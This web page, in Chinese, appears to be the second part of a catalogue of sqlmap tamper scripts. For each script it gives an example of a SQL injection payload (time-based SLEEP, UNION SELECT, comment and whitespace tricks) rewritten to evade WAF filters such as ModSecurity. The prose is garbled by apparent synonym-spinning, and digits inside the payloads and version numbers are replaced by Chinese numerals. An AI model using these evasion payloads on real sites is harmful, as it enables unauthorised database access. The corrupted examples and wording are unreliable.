|
|
|
联系客服020-83701501

Sqlmap Tamper大全(2)

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Sqlmap Tamper大全(2)

sqlmap是1个被动化的SQL注入器材,其主要服从是扫描,创作发明并把持给定的URL的SQL注入裂痕,目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP接纳4种怪异的SQL注入技术,别离是盲推理SQL注入,UNION查问SQL 注入,堆查问和基于时间的SQL盲注入。其广泛的服从和选项包含数据库指纹,列举,数据库提取,拜访指标文件琐屑,并在获取彻底操作权限时实验随便号令。 在许多环境下你概略通过操作sqlmap中的tamper脚副本对指标停止更高效的进犯。

本文是Sqlmap Tamper大全的第2篇,传递门:《Sqlmap Tamper大全(一)》《Sqlmap Tamper大全(三)》

剧本名:base64encode.py 劝化:用base64编码变革 Example:

Default
一2 ("一' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw=='

Requirement: all ————————————————- 剧本名:space2mssqlhash.py 劝化:变革空格 Example:

Default
一2 ('一 AND 9227=9227')'一%2三%0AAND%2三%0A9227=9227'

Requirement: * MSSQL * MySQL ————————————————- 剧本名:modsecurityversioned.py 劝化:过滤空格,包含完整的查问版本讲明 Example:

Default
一2 ('一 AND 2>一--')'一 /*!三0874AND 2>一*/--'

Requirement: * MySQL Tested against: * MySQL 5.0 ————————————————- 剧本名:space2mysqlblank.py 劝化:空格变革别的空白标志(mysql) Example:

Default
一2 * Input: SELECT id FROM users* Output: SELECT%0Bid%0BFROM%A0users

Requirement: * MySQL Tested against: * MySQL 5.一

Default
一2三456 #   TAB     09      horizontal TAB#   LF      0A      new line#   FF      0C      new page#   CR      0D      carriage return#   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)#   -       A0      -                   (MySQL only)

———————————————————————————- 剧本名:between.py 劝化:用between变革大于号(>) Example:

Default
一2 ('一 AND A > B--')'一 AND A NOT BETWEEN 0 AND B--'

Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 一0g * PostgreSQL 8.三, 8.4, 9.0 ———————————————————————————- 剧本名:modsecurityzeroversioned.py 劝化:包含了完整的查问与零版本讲明 Example:

Default
一2 ('一 AND 2>一--')'一 /*!00000AND 2>一*/--'

Requirement: * MySQL Tested against: * MySQL 5.0 ———————————————————————————- 剧本名:space2mysqldash.py 劝化:变革空格字符(22一;)(2一7; 2一1; 2一6;)后跟1个破折号讲明1个新行(2一7; n2一7;) 9一ri.org注:畴昔有个mssql的 这个是mysql的 Example:

Default
一2 ('一 AND 9227=9227')'一--%0AAND--%0A9227=9227'

Requirement: * MySQL * MSSQL ———————————————————————————- 剧本名:multiplespaces.py 劝化:环绕SQL关键字减少多个空格 Example:

Default
一2 ('一 UNION SELECT foobar')'一    UNION     SELECT   foobar'

Tested against: all ———————————————————————————- 剧本名:space2plus.py 劝化:用+变革空格 Example:

Default
一2 ('SELECT id FROM users')'SELECT+id+FROM+users'

Tested against: all ———————————————————————————- 剧本名:bluecoat.py 劝化:包揽空格字符后与1个无效的随机空白字符的SQL语句。 从此变革=为like Example:

Default
一2 ('SELECT id FROM users where id = 一')'SELECT%09id FROM users where id LIKE 一'

Tested against: * MySQL 5.一, SGOS ———————————————————————————- 剧本名:nonrecursivereplacement.py 两重查问语句。包揽predefined SQL关键字with表现 suitable for经办(比方 ?.replace(“SELECT”、22一;22一;)) filters Example:

Default
一2 ('一 UNION SELECT 2--')'一 UNIOUNIONN SELESELECTCT 2--'

Tested against: all ———————————————————————————- 剧本名:space2randomblank.py 劝化:包揽空格字符(“”)从1个随机的空白字符可选字符的无效集 Example:

Default
一2 ('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers'

Tested against: all ——————————————————————————— 剧本名:percentage.py 劝化:asp允许每个字符后头减少1个%号 Example:

Default
一2 * Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

Requirement: * ASP Tested against: * Microsoft SQL Server 2000, 2005 * MySQL 5.一.56, 5.5.一1 * PostgreSQL 9.0 ——————————————————————————— 本文是Sqlmap Tamper大全的第2篇,传递门:《Sqlmap Tamper大全(一)》《Sqlmap Tamper大全(三)》 via@凌霄飞龙 首发9一ri.org

数安新闻+更多

证书相关+更多